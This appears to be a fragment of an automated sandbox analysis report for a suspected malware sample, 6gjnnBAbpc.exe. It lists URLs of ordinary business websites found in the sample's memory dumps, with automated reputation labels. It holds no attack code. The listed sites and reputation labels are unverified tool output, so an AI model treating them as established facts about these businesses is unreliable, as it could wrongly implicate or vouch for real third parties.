6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=26698c2509d8a9f37e69464fad7be5f1	6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oss.maxcdn.com/respond/1.4.2/respond.min.js	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.19.0	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.11.0	6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/wp-content/uploads/2023/03/MONITORING-768x432.jpg	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/wp-content/uploads/2023/03/Izdelek-brez-naslova-2.png	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.valselit.com/174-appartement-a-vendre-grenoble-30514	6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.item-pr.com/qK	6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.pwd.org/	6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/	6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/brand/handheld/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-50x42.jpg	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
